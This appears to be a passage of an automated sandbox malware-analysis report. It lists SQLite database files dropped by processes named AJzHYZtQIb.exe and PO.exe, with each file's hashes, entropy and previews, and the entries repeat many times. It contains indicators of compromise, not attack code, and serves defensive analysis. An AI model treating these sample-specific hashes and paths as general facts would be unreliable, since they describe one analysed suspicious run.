                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
